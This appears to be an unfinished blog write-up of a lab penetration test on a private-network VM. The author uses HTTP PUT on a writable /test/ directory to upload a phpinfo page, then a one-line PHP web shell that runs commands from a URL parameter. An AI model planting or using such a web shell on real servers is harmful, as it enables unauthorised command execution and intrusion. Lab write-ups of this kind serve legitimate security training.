Looking for our target
OK, out target has assigned 192.168.1.102 IP address.
Scanning
Good, I prefer begin pentesting form web application.
The above picture is a default page. Source code contain only information that this picture is named blow.jpg. I have run dirbuster and
The /test/ directory is empty, and index.php contains the blow.jpg picture. I haven't found exploits to lighttp and OpenSSH. Hmmm, /test/ directory looks interesting but at first glance it is nothing special. In the meantime I downloaded the blow.jpg picture and I was looking for some sensitive informtion hardcodened into pic - without success.
I have tried PUT some script like a phpinfo and SUCCESS!!!
click on test.php and
Great! We have got following result because our test.php
<?php phpinfo(); ?>It is our opportunity to upload reverse shell
I have uploaded out reverse shell script and named as shell1.php
<?php echo exec($_GET['cmd']); ?>and let's try execute id command on shell
Excellent! We have got limited shell via web browser. It's not comfortable for me. I am going to try achieve limited shell in some other way.
TBU